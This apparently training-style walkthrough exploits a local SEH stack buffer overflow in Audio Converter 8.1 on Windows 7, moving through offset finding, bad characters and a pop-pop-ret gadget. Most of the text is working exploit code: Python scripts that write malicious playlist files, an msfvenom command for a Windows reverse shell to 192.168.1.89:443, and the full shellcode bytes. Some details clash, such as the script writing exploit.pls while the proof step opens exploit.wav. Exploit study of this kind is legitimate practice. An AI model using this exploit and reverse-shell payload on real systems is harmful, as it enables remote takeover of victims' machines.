Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM Walkthrough

(Updated: )
reference Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

fuzz

omit to save time

exploit.py
1
2
3
4
payload="A"*50000

with open("exploit.wav", "w") as fp:
    fp.write(payload)

offset

omitted

exploit.py
1
2
3
payload="A"*4436
payload+="BBBB"
payload+="C"*(50000-4436-4)

badchar

omitted

Ignore ā€œ\x00\x0a\x3dā€.

return address

seh

Use !mona seh to search for pop-pop-retn:

audconv.dll is not ASLR enabled:

shellcode

1st stage

jmp short to the 50000-4436-4 byte memory:

2nd stage

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a\x3d"

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
shellcode =  b""
shellcode += b"\xba\x9b\x45\xac\xa0\xda\xca\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x52\x31\x56\x12\x03\x56\x12"
shellcode += b"\x83\x75\xb9\x4e\x55\x75\xaa\x0d\x96\x85\x2b"
shellcode += b"\x72\x1e\x60\x1a\xb2\x44\xe1\x0d\x02\x0e\xa7"
shellcode += b"\xa1\xe9\x42\x53\x31\x9f\x4a\x54\xf2\x2a\xad"
shellcode += b"\x5b\x03\x06\x8d\xfa\x87\x55\xc2\xdc\xb6\x95"
shellcode += b"\x17\x1d\xfe\xc8\xda\x4f\x57\x86\x49\x7f\xdc"
shellcode += b"\xd2\x51\xf4\xae\xf3\xd1\xe9\x67\xf5\xf0\xbc"
shellcode += b"\xfc\xac\xd2\x3f\xd0\xc4\x5a\x27\x35\xe0\x15"
shellcode += b"\xdc\x8d\x9e\xa7\x34\xdc\x5f\x0b\x79\xd0\xad"
shellcode += b"\x55\xbe\xd7\x4d\x20\xb6\x2b\xf3\x33\x0d\x51"
shellcode += b"\x2f\xb1\x95\xf1\xa4\x61\x71\x03\x68\xf7\xf2"
shellcode += b"\x0f\xc5\x73\x5c\x0c\xd8\x50\xd7\x28\x51\x57"
shellcode += b"\x37\xb9\x21\x7c\x93\xe1\xf2\x1d\x82\x4f\x54"
shellcode += b"\x21\xd4\x2f\x09\x87\x9f\xc2\x5e\xba\xc2\x8a"
shellcode += b"\x93\xf7\xfc\x4a\xbc\x80\x8f\x78\x63\x3b\x07"
shellcode += b"\x31\xec\xe5\xd0\x36\xc7\x52\x4e\xc9\xe8\xa2"
shellcode += b"\x47\x0e\xbc\xf2\xff\xa7\xbd\x98\xff\x48\x68"
shellcode += b"\x0e\xaf\xe6\xc3\xef\x1f\x47\xb4\x87\x75\x48"
shellcode += b"\xeb\xb8\x76\x82\x84\x53\x8d\x45\x6b\x0b\x8c"
shellcode += b"\xcc\x03\x4e\x8e\xef\x68\xc7\x68\x85\x9e\x8e"
shellcode += b"\x23\x32\x06\x8b\xbf\xa3\xc7\x01\xba\xe4\x4c"
shellcode += b"\xa6\x3b\xaa\xa4\xc3\x2f\x5b\x45\x9e\x0d\xca"
shellcode += b"\x5a\x34\x39\x90\xc9\xd3\xb9\xdf\xf1\x4b\xee"
shellcode += b"\x88\xc4\x85\x7a\x25\x7e\x3c\x98\xb4\xe6\x07"
shellcode += b"\x18\x63\xdb\x86\xa1\xe6\x67\xad\xb1\x3e\x67"
shellcode += b"\xe9\xe5\xee\x3e\xa7\x53\x49\xe9\x09\x0d\x03"
shellcode += b"\x46\xc0\xd9\xd2\xa4\xd3\x9f\xda\xe0\xa5\x7f"
shellcode += b"\x6a\x5d\xf0\x80\x43\x09\xf4\xf9\xb9\xa9\xfb"
shellcode += b"\xd0\x79\xd9\xb1\x78\x2b\x72\x1c\xe9\x69\x1f"
shellcode += b"\x9f\xc4\xae\x26\x1c\xec\x4e\xdd\x3c\x85\x4b"
shellcode += b"\x99\xfa\x76\x26\xb2\x6e\x78\x95\xb3\xba"


# badchars: \x00\x0a\x3d
payload="A"*4432
payload+="\xeb\x06\x41\x41"
# audconv.dll 0x1003f4e6
payload+="\xe6\xf4\x03\x10"
payload+="\x90"*16
payload+=shellcode
payload+="C"*(45544-len(shellcode))

with open("exploit.pls", "w") as fp:
    fp.write(payload)

proof

Audio Converter: File->Add Playlist..., choose exploit.wav.